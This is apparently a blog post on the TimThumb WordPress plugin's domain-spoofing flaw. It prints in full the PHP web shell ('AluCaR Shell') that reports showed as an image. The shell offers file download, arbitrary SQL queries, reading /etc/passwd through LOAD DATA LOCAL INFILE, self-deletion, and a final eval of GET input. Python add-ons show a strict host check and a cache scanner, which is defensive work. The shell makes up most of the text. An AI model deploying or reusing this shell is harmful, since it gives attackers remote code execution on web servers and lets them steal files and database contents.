Vulnerability in the third-party WordPress plugin TimThumb exposed

Today I saw that all the major sites are reporting an exposed vulnerability in the third-party WordPress plugin TimThumb. TimThumb is a third-party image-processing script that performs dynamic image cropping, scaling and resizing.

The script's file name is timthumb.php. The file defines several image hosts from which images may be fetched remotely, but the script does not properly validate those domain names, so a spoofed second- or third-level domain such as http://flickr.com.maliciousdomain.com also passes the check. In theory an attacker can therefore impersonate any allowed domain simply by appending a suffix, and upload arbitrary malicious programs through the cache directory.
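The domain check described above, as an added illustration in Python rather than TimThumb's own PHP (this is not the plugin's code): the weak substring match accepts http://flickr.com.maliciousdomain.com, while a strict match on the parsed host does not. The ALLOWED_HOSTS list and the helper names are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Assumed allow-list for the example; TimThumb's real list is not reproduced.
ALLOWED_HOSTS = ("flickr.com", "picasa.com", "blogger.com", "wordpress.com")


def weak_host_check(url: str) -> bool:
    """Flawed check of the kind described in the post: the URL is accepted if
    any allowed name appears anywhere in it. The allowed name only has to be
    a substring, so spoofed sub-domains, paths and userinfo tricks all pass."""
    return any(host in url for host in ALLOWED_HOSTS)


def strict_host_check(url: str) -> bool:
    """Hardened check: parse the URL, then require the host to equal an
    allowed name or to be a proper sub-domain of it (label boundary kept)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    for allowed in ALLOWED_HOSTS:
        if host == allowed or host.endswith("." + allowed):
            return True
    return False


def classify(url: str) -> dict:
    """Run both checks on one URL so the difference is visible side by side."""
    return {"weak": weak_host_check(url), "strict": strict_host_check(url)}


if __name__ == "__main__":
    # Constructed sample URLs: the first two are legitimate, the rest spoofed.
    for sample in (
        "http://flickr.com/photo.jpg",
        "http://farm1.flickr.com/photo.jpg",
        "http://flickr.com.maliciousdomain.com/x.php",
        "http://notflickr.com/x.php",
        "http://evil.example/flickr.com/x.php",
        "http://flickr.com@evil.example/x.php",
    ):
        print(sample, classify(sample))
```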

The reporting is somewhat exaggerated: after all, this is a vulnerability in the third-party plugin TimThumb, and anyone who has not installed TimThumb can ignore it entirely. Also, the impressive-looking image in the reports is just a PHP backdoor program. Its code is as follows:

<?php
  $language='eng';
  $auth = 0;
  $name='ecd708a016f8407bd27cc0a02677351b'; //// AluCaR
  $pass='1b8644e229c999e4f6ba799483b196ce'; //// HcEgRoUp.NeT
  /******************************************************************************************************/
  
  error_reporting(E_ALL);
  set_magic_quotes_runtime(0);
  @set_time_limit(0);
  @ini_set('max_execution_time',0);
  @ini_set('output_buffering',0);
  $safe_mode = @ini_get('safe_mode');
  $version = 'VietTeam Edition';
  if(version_compare(phpversion(), '4.1.0') == -1)
  {
    $_POST   = &$HTTP_POST_VARS;
    $_GET    = &$HTTP_GET_VARS;
    $_SERVER = &$HTTP_SERVER_VARS;
    $_COOKIE = &$HTTP_COOKIE_VARS;
  }
  if (@get_magic_quotes_gpc())
  {
    foreach ($_POST as $k=>$v)
    {
      $_POST[$k] = stripslashes($v);
    }
    foreach ($_COOKIE as $k=>$v)
    {
      $_COOKIE[$k] = stripslashes($v);
    }
  }
  
  if($auth == 1) {
    if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!= $name || md5($_SERVER['PHP_AUTH_PW'])!= $pass)
    {
      header('WWW-Authenticate: Basic realm="hCe-GrOuP + AluCaR"');
      header('HTTP/1.0 401 Unauthorized');
      exit("<b>Contact <a href=http://hcegroup.vn/ </a> : Access Denied</b>");
    }
  }
  $head = '<!-- Edited by Alucar -->
  <html>
  <head>
  </script>
  <title>AluCaR Shell</title>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  
  <STYLE>
  tr {
  BORDER-RIGHT:  #Black 1px solid;
  BORDER-TOP:    Black 1px solid;
  BORDER-LEFT:   Black 1px solid;
  BORDER-BOTTOM: #Black 1px solid;
  BORDER-COLOR: #83c809;
  color: White;
  }
  td {
  BORDER-RIGHT:  #Black 1px solid;
  BORDER-TOP:    Black 1px solid;
  BORDER-LEFT:   Black 1px solid;
  BORDER-BOTTOM: #Black 1px solid;
  BORDER-COLOR: #83c809;
  color: White;
  }
  .table1 {
  BORDER: 0px;
  BORDER-COLOR: #83c809;
  BACKGROUND-COLOR: Black;
  color: White;
  }
  .td1 {
  BORDER: 0px;
  BORDER-COLOR: #83c809;
  font: 7pt Verdana;
  color: White;
  }
  .tr1 {
  BORDER: 0px;
  BORDER-COLOR: #83c809;
  color: White;
  }
  table {
  BORDER:  Black 1px outset;
  BORDER-COLOR: #83c809;
  BACKGROUND-COLOR: Black;
  color: White;
  }
  input {
  border			: solid 1px;
  border-color		: White White White White;
  BACKGROUND-COLOR: Black;
  font: 8pt Verdana;
  color: White;
  }
  select {
  BORDER-RIGHT:  Black 1px solid;
  BORDER-TOP:    White 1px solid;
  BORDER-LEFT:   White 1px solid;
  BORDER-BOTTOM: Black 1px solid;
  BORDER-COLOR: White;
  BACKGROUND-COLOR: Black;
  font: 8pt Verdana;
  color: Red;
  }
  submit {
  BORDER:  buttonhighlight 2px outset;
  BACKGROUND-COLOR: Black;
  width: 30%;
  color: White;
  }
  textarea {
  BORDER-RIGHT:  Black 1px solid;
  BORDER-TOP:    White 1px solid;
  BORDER-LEFT:   White 1px solid;
  BORDER-BOTTOM: Black 1px solid;
  BORDER-COLOR: #83c809;
  BACKGROUND-COLOR: Black;
  font: Fixedsys bold;
  color: White;
  }
  BODY {
	SCROLLBAR-FACE-COLOR: Black; SCROLLBAR-HIGHLIGHT-COLOR: White; SCROLLBAR-SHADOW-COLOR: White; SCROLLBAR-3DLIGHT-COLOR: White; SCROLLBAR-ARROW-COLOR: Black; SCROLLBAR-TRACK-COLOR: White; SCROLLBAR-DARKSHADOW-COLOR: White
  margin: 1px;
  color: Red;
  background-color: Black;
  }
  .main {
  margin			: -287px 0px 0px -490px;
  border			: White solid 1px;
  BORDER-COLOR: #83c809;
  }
  .tt {
  background-color: Black;
  }
  
  A:link {
	COLOR: #347202; TEXT-DECORATION: none
  }
  A:visited {
	COLOR: #347202; TEXT-DECORATION: none
  }
  A:hover {
	COLOR: White; TEXT-DECORATION: none
  }
  A:active {
	COLOR: White; TEXT-DECORATION: none
  }
  </STYLE>
  <script language=\'javascript\'>
  function hide_div(id)
  {
  document.getElementById(id).style.display = \'none\';
  document.cookie=id+\'=0;\';
  }
  function show_div(id)
  {
  document.getElementById(id).style.display = \'block\';
  document.cookie=id+\'=1;\';
  }
  function change_divst(id)
  {
  if (document.getElementById(id).style.display == \'none\')
  show_div(id);
  else
  hide_div(id);
  }
  </script>';
  class zipfile
  {
    var $datasec      = array();
    var $ctrl_dir     = array();
    var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";
    var $old_offset   = 0;
    function unix2DosTime($unixtime = 0) {
      $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
      if ($timearray['year'] < 1980) {
        $timearray['year']    = 1980;
        $timearray['mon']     = 1;
        $timearray['mday']    = 1;
        $timearray['hours']   = 0;
        $timearray['minutes'] = 0;
        $timearray['seconds'] = 0;
      }
      return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |
      ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);
    }
    function addFile($data, $name, $time = 0)
    {
      $name     = str_replace('\\', '/', $name);
      $dtime    = dechex($this->unix2DosTime($time));
      $hexdtime = '\x' . $dtime[6] . $dtime[7]
      . '\x' . $dtime[4] . $dtime[5]
      . '\x' . $dtime[2] . $dtime[3]
      . '\x' . $dtime[0] . $dtime[1];
      eval('$hexdtime = "' . $hexdtime . '";');
      $fr   = "\x50\x4b\x03\x04";
      $fr   .= "\x14\x00";
      $fr   .= "\x00\x00";
      $fr   .= "\x08\x00";
      $fr   .= $hexdtime;
      $unc_len = strlen($data);
      $crc     = crc32($data);
      $zdata   = gzcompress($data);
      $zdata   = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
      $c_len   = strlen($zdata);
      $fr      .= pack('V', $crc);
      $fr      .= pack('V', $c_len);
      $fr      .= pack('V', $unc_len);
      $fr      .= pack('v', strlen($name));
      $fr      .= pack('v', 0);
      $fr      .= $name;
      $fr .= $zdata;
      $this -> datasec[] = $fr;
      $cdrec = "\x50\x4b\x01\x02";
      $cdrec .= "\x00\x00";
      $cdrec .= "\x14\x00";
      $cdrec .= "\x00\x00";
      $cdrec .= "\x08\x00";
      $cdrec .= $hexdtime;
      $cdrec .= pack('V', $crc);
      $cdrec .= pack('V', $c_len);
      $cdrec .= pack('V', $unc_len);
      $cdrec .= pack('v', strlen($name) );
      $cdrec .= pack('v', 0 );
      $cdrec .= pack('v', 0 );
      $cdrec .= pack('v', 0 );
      $cdrec .= pack('v', 0 );
      $cdrec .= pack('V', 32 );
      $cdrec .= pack('V', $this -> old_offset );
      $this -> old_offset += strlen($fr);
      $cdrec .= $name;
      $this -> ctrl_dir[] = $cdrec;
    }
    function file()
    {
      $data    = implode('', $this -> datasec);
      $ctrldir = implode('', $this -> ctrl_dir);
      return
      $data .
      $ctrldir .
      $this -> eof_ctrl_dir .
      pack('v', sizeof($this -> ctrl_dir)) .
      pack('v', sizeof($this -> ctrl_dir)) .
      pack('V', strlen($ctrldir)) .
      pack('V', strlen($data)) .
      "\x00\x00";
    }
  }
  function compress(&$filename,&$filedump,$compress)
  {
    global $content_encoding;
    global $mime_type;
    if ($compress == 'bzip' && @function_exists('bzcompress'))
    {
      $filename  .= '.bz2';
      $mime_type = 'application/x-bzip2';
      $filedump = bzcompress($filedump);
    }
    else if ($compress == 'gzip' && @function_exists('gzencode'))
    {
      $filename  .= '.gz';
      $content_encoding = 'x-gzip';
      $mime_type = 'application/x-gzip';
      $filedump = gzencode($filedump);
    }
    else if ($compress == 'zip' && @function_exists('gzcompress'))
    {
     	$filename .= '.zip';
      $mime_type = 'application/zip';
      $zipfile = new zipfile();
      $zipfile -> addFile($filedump, substr($filename, 0, -4));
      $filedump = $zipfile -> file();
    }
    else
    {
     	$mime_type = 'application/octet-stream';
    }
  }
  function mailattach($to,$from,$subj,$attach)
  {
    $headers  = "From: $from\r\n";
    $headers .= "MIME-Version: 1.0\r\n";
    $headers .= "Content-Type: ".$attach['type'];
    $headers .= "; name=\"".$attach['name']."\"\r\n";
    $headers .= "Content-Transfer-Encoding: base64\r\n\r\n";
    $headers .= chunk_split(base64_encode($attach['content']))."\r\n";
    if(@mail($to,$subj,"",$headers)) { return 1; }
    return 0;
  }
  class my_sql
  {
    var $host = 'localhost';
    var $port = '';
    var $user = '';
    var $pass = '';
    var $base = '';
    var $db   = '';
    var $connection;
    var $res;
    var $error;
    var $rows;
    var $columns;
    var $num_rows;
    var $num_fields;
    var $dump;
    
    function connect()
    {
      switch($this->db)
      {
        case 'MySQL':
          if(empty($this->port)) { $this->port = '3306'; }
          if(!function_exists('mysql_connect')) return 0;
          $this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);
          if(is_resource($this->connection)) return 1;
          break;
        case 'MSSQL':
          if(empty($this->port)) { $this->port = '1433'; }
          if(!function_exists('mssql_connect')) return 0;
          $this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);
          if($this->connection) return 1;
          break;
        case 'PostgreSQL':
          if(empty($this->port)) { $this->port = '5432'; }
          $str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";
          if(!function_exists('pg_connect')) return 0;
          $this->connection = @pg_connect($str);
          if(is_resource($this->connection)) return 1;
          break;
        case 'Oracle':
          if(!function_exists('ocilogon')) return 0;
          $this->connection = @ocilogon($this->user, $this->pass, $this->base);
          if(is_resource($this->connection)) return 1;
          break;
      }
      return 0;
    }
    
    function select_db()
    {
      switch($this->db)
      {
        case 'MySQL':
          if(@mysql_select_db($this->base,$this->connection)) return 1;
          break;
        case 'MSSQL':
          if(@mssql_select_db($this->base,$this->connection)) return 1;
          break;
        case 'PostgreSQL':
          return 1;
          break;
        case 'Oracle':
          return 1;
          break;
      }
      return 0;
    }
    
    function query($query)
    {
      $this->res=$this->error='';
      switch($this->db)
      {
        case 'MySQL':
          if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))
          {
            $this->error = @mysql_error($this->connection);
            return 0;
          }
          else if(is_resource($this->res)) { return 1; }
          return 2;
          break;
        case 'MSSQL':
          if(false===($this->res=@mssql_query($query,$this->connection)))
          {
            $this->error = 'Query error';
            return 0;
          }
          else if(@mssql_num_rows($this->res) > 0) { return 1; }
          return 2;
          break;
        case 'PostgreSQL':
          if(false===($this->res=@pg_query($this->connection,$query)))
          {
            $this->error = @pg_last_error($this->connection);
            return 0;
          }
          else if(@pg_num_rows($this->res) > 0) { return 1; }
          return 2;
          break;
        case 'Oracle':
          if(false===($this->res=@ociparse($this->connection,$query)))
          {
            $this->error = 'Query parse error';
          }
          else
          {
            if(@ociexecute($this->res))
            {
              if(@ocirowcount($this->res) != 0) return 2;
              return 1;
            }
            $error = @ocierror();
            $this->error=$error['message'];
          }
          break;
      }
      return 0;
    }
    function get_result()
    {
      $this->rows=array();
      $this->columns=array();
      $this->num_rows=$this->num_fields=0;
      switch($this->db)
      {
        case 'MySQL':
          $this->num_rows=@mysql_num_rows($this->res);
          $this->num_fields=@mysql_num_fields($this->res);
          while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));
          @mysql_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
          break;
        case 'MSSQL':
          $this->num_rows=@mssql_num_rows($this->res);
          $this->num_fields=@mssql_num_fields($this->res);
          while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));
          @mssql_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};
          break;
        case 'PostgreSQL':
          $this->num_rows=@pg_num_rows($this->res);
          $this->num_fields=@pg_num_fields($this->res);
          while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));
          @pg_free_result($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
          break;
        case 'Oracle':
          $this->num_fields=@ocinumcols($this->res);
          while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;
          @ocifreestatement($this->res);
          if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}
          break;
      }
      return 0;
    }
    function dump($table)
    {
      if(empty($table)) return 0;
      $this->dump=array();
      $this->dump[0] = '##';
      $this->dump[1] = '## --------------------------------------- ';
      $this->dump[2] = '##  Created: '.date ("d/m/Y H:i:s");
      $this->dump[3] = '## Database: '.$this->base;
      $this->dump[4] = '##    Table: '.$table;
      $this->dump[5] = '## --------------------------------------- ';
      switch($this->db)
      {
        case 'MySQL':
          $this->dump[0] = '## MySQL dump';
          if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;
          if(!$this->get_result()) return 0;
          $this->dump[] = $this->rows[0]['Create Table'];
          $this->dump[] = '## --------------------------------------- ';
          if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
          {
            foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}
            $this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
          }
          break;
        case 'MSSQL':
          $this->dump[0] = '## MSSQL dump';
          if($this->query('SELECT * FROM '.$table)!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
          {
            foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
          }
          break;
        case 'PostgreSQL':
          $this->dump[0] = '## PostgreSQL dump';
          if($this->query('SELECT * FROM '.$table)!=1) return 0;
          if(!$this->get_result()) return 0;
          for($i=0;$i<$this->num_rows;$i++)
          {
            foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}
            $this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';
          }
          break;
        case 'Oracle':
          $this->dump[0] = '## ORACLE dump';
          $this->dump[]  = '## under construction';
          break;
        default:
          return 0;
          break;
      }
      return 1;
    }
    function close()
    {
      switch($this->db)
      {
        case 'MySQL':
          @mysql_close($this->connection);
          break;
        case 'MSSQL':
          @mssql_close($this->connection);
          break;
        case 'PostgreSQL':
          @pg_close($this->connection);
          break;
        case 'Oracle':
          @oci_close($this->connection);
          break;
      }
    }
    function affected_rows()
    {
      switch($this->db)
      {
        case 'MySQL':
          return @mysql_affected_rows($this->res);
          break;
        case 'MSSQL':
          return @mssql_affected_rows($this->res);
          break;
        case 'PostgreSQL':
          return @pg_affected_rows($this->res);
          break;
        case 'Oracle':
          return @ocirowcount($this->res);
          break;
        default:
          return 0;
          break;
      }
    }
  }
  if(!empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
  {
    if(!$file=@fopen($_POST['d_name'],"r")) { err(1,$_POST['d_name']); $_POST['cmd']=""; }
    else
    {
      @ob_clean();
      $filename = @basename($_POST['d_name']);
      $filedump = @fread($file,@filesize($_POST['d_name']));
      fclose($file);
      $content_encoding=$mime_type='';
      compress($filename,$filedump,$_POST['compress']);
      if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
      header("Content-type: ".$mime_type);
      header("Content-disposition: attachment; filename=\"".$filename."\";");
      echo $filedump;
      exit();
    }
  }
  if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die(); }
  if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
  {
    echo $head;
    $sql = new my_sql();
    $sql->db   = $_POST['db'];
    $sql->host = $_POST['db_server'];
    $sql->port = $_POST['db_port'];
    $sql->user = $_POST['mysql_l'];
    $sql->pass = $_POST['mysql_p'];
    $sql->base = $_POST['mysql_db'];
    $querys = @explode(';',$_POST['db_query']);
    echo '<body bgcolor=Black>';
    if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=White><b>Can't connect to SQL server</b></font></div>";
    else
    {
      if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=White><b>Can't select database</b></font></div>";
      else
      {
        foreach($querys as $num=>$query)
        {
          if(strlen($query)>5)
          {
            echo "<font face=Verdana size=-2 color=White><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
            switch($sql->query($query))
            {
              case '0':
                echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
                break;
              case '1':
                if($sql->get_result())
                {
                  echo "<table width=100% border=0 cellpadding=0 cellspacing=0>";
                  foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
                  $keys = @implode(" </b></font></td><td class=main><font face=Verdana size=-2><b> ", $sql->columns);
                  echo "<tr><td class=main bgcolor=White><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
                  for($i=0;$i<$sql->num_rows;$i++)
                  {
                    foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
                    $values = @implode(" </font></td><td class=main><font face=Verdana size=-2> ",$sql->rows[$i]);
                    echo '<tr><td class=main><font face=Verdana size=-2> '.$values.' </font></td></tr>';
                  }
                  echo "</table>";
                }
                break;
              case '2':
                $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
                echo "<table width=100%><tr><td class=main><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
                break;
            }
          }
        }
      }
      echo "<br><div align=left id='n'><table width=100% height=60 border=0 cellpadding=0 cellspacing=0>";
      echo "<tr><td align=center><b>Show Database</b></td><td align=center><b>Show Tables</b></td></tr>";
      echo "<tr><td><textarea cols=50 rows=6 name=query_db>";
      $query_db = mysql_query("SHOW DATABASES;");
      while ($query_db_row = mysql_fetch_array($query_db))
      {
        echo $query_db_row[0]."\n";
      }
      echo "</textarea></td><td><div align=right><textarea cols=60 rows=6 name=query_tables>";
      if (($_POST['mysql_db']) && $sql->select_db())
      {
        $query_tables = mysql_query("SHOW TABLES;");
        while ($query_tables_row = mysql_fetch_array($query_tables))
        {
          echo $query_tables_row[0]."\n";
        }
      }
      echo "</textarea></div></td></tr></table></div>";
    }
    echo "<br><form name=form method=POST>";
    echo in('hidden','db',0,$_POST['db']);
    echo in('hidden','db_server',0,$_POST['db_server']);
    echo in('hidden','db_port',0,$_POST['db_port']);
    echo in('hidden','mysql_l',0,$_POST['mysql_l']);
    echo in('hidden','mysql_p',0,$_POST['mysql_p']);
    echo in('hidden','mysql_db',0,$_POST['mysql_db']);
    echo in('hidden','cmd',0,'db_query');
    echo "<div align=center>";
    echo "<font face=Verdana size=-2><b>Use database: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
    echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
    echo "<div align=center><font face=Verdana size=-2><b>Load file: </b><input type=text name=loadfile size=100 value=".(!empty($_POST['loadfile'])?($_POST['loadfile']):("/etc/passwd")).">".ws(2)."<input type=submit name=submit value=\" Load \">

";
    echo "<b>File content</b><br><br>";
    echo "<textarea cols=121 rows=15 name=showloadfile>";
    @mysql_query("DROP TABLE IF EXISTS Alucar");
    @mysql_query("CREATE TABLE `Alucar` ( `file` LONGBLOB NOT NULL )");
    @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['loadfile'])."\" INTO TABLE Alucar FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
    $r = @mysql_query("SELECT * FROM Alucar");
    while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
    @mysql_query("DROP TABLE IF EXISTS Alucar");
    echo "</textarea></div>";
    echo "</form>";
    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
  }
  if(isset($_GET['delete']))
  {
    @unlink(__FILE__);
  }
  if(isset($_GET['tmp']))
  {
    @unlink("/tmp/bdpl");
    @unlink("/tmp/back");
    @unlink("/tmp/bd");
    @unlink("/tmp/bd.c");
    @unlink("/tmp/dp");
    @unlink("/tmp/dpc");
    @unlink("/tmp/dpc.c");
  }
  if(isset($_GET['phpini']))
  {
    echo $head;
    function U_value($value)
    {
      if ($value == '') return '<i>no value</i>';
      if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
      if ($value === null) return 'NULL';
      if (@is_object($value)) $value = (array) $value;
      if (@is_array($value))
      {
        @ob_start();
        print_r($value);
        $value = @ob_get_contents();
        @ob_end_clean();
      }
      return U_wordwrap((string) $value);
    }
    function U_wordwrap($str)
    {
      $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
      return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
    }
    if (@function_exists('ini_get_all'))
    {
      $r = '';
      echo '<table width=100%>', '<tr><td class=main bgcolor=#83c809><font face=Verdana size=-2 color=White><div align=center><b>Directive</b></div></font></td><td class=main bgcolor=#83c809><font face=Verdana size=-2 color=White><div align=center><b>Local Value</b></div></font></td><td class=main bgcolor=#83c809><font face=Verdana size=-2 color=White><div align=center><b>Master Value</b></div></font></td></tr>';
      foreach (@ini_get_all() as $key=>$value)
      {
        $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
      }
      echo $r;
      echo '</table>';
    }
    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
    die();
  }
  if(isset($_GET['cpu']))
  {
    echo $head;
    echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=White><b>CPU</b></font></div></td></tr></table><table width=100%>';
    $cpuf = @file("cpuinfo");
    if($cpuf)
    {
      $c = @sizeof($cpuf);
      for($i=0;$i<$c;$i++)
      {
        $info = @explode(":",$cpuf[$i]);
        if($info[1]==""){ $info[1]="---"; }
        $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
      }
      echo $r;
    }
    else
    {
      echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
    }
    echo '</table>';
    echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b>";
  ?>
<?php
  eval(stripslashes($_GET['eval'])); 
  ?>
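Added example, not part of the original post: a small scanner for a TimThumb-style cache directory that flags files carrying PHP code behind an image header, using indicator strings drawn from the backdoor listed above. The directory layout and the three sample files are constructed inside the script.

```python
import os
import re
import tempfile
from typing import Dict, List, Optional

# Generic PHP open tag plus indicators taken from the backdoor listing above.
PHP_OPEN_TAG = re.compile(rb"<\?php\b|<\?=", re.I)
INDICATORS = {
    "eval_of_request_input": re.compile(
        rb"\beval\s*\(\s*(stripslashes\s*\(\s*)?\$_(GET|POST|REQUEST|COOKIE)", re.I),
    "magic_quotes_runtime": re.compile(rb"\bset_magic_quotes_runtime\s*\(", re.I),
    "load_data_local_infile": re.compile(rb"LOAD\s+DATA\s+LOCAL\s+INFILE", re.I),
    "self_delete": re.compile(rb"\bunlink\s*\(\s*__FILE__\s*\)", re.I),
}
IMAGE_MAGIC = (
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
)
MAX_READ = 512 * 1024  # read at most this much of each file


def image_kind(data: bytes) -> Optional[str]:
    """Return the image type implied by the leading magic bytes, or None."""
    for magic, kind in IMAGE_MAGIC:
        if data.startswith(magic):
            return kind
    return None


def scan_bytes(data: bytes) -> Dict[str, object]:
    """Classify one file body. A PHP tag behind an image header is the
    'image that is really a backdoor' case described in the post."""
    kind = image_kind(data)
    has_php = PHP_OPEN_TAG.search(data) is not None
    hits: List[str] = [name for name, rx in INDICATORS.items() if rx.search(data)]
    if not has_php and not hits:
        verdict = "clean"
    elif kind is not None:
        verdict = "php_hidden_in_image"
    else:
        verdict = "php_script"
    return {"image_kind": kind, "has_php": has_php, "indicators": hits, "verdict": verdict}


def scan_dir(root: str) -> List[Dict[str, object]]:
    """Walk a cache directory and return a finding for every non-clean file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                result = scan_bytes(fh.read(MAX_READ))
            if result["verdict"] != "clean":
                result["path"] = os.path.relpath(path, root)
                findings.append(result)
    return sorted(findings, key=lambda r: r["path"])


def demo() -> List[Dict[str, object]]:
    """Build a constructed cache directory with three files and scan it."""
    samples = {
        "real.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 64,  # genuine-looking JPEG
        "fake.gif": b"GIF89a" + b"\x00" * 16 + b"<?php eval(stripslashes($_GET['eval'])); ?>",
        "shell.php": b"<?php set_magic_quotes_runtime(0); @unlink(__FILE__); ?>",
    }
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_dir(root)


if __name__ == "__main__":
    for finding in demo():
        print(finding["path"], finding["verdict"], finding["indicators"])
```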
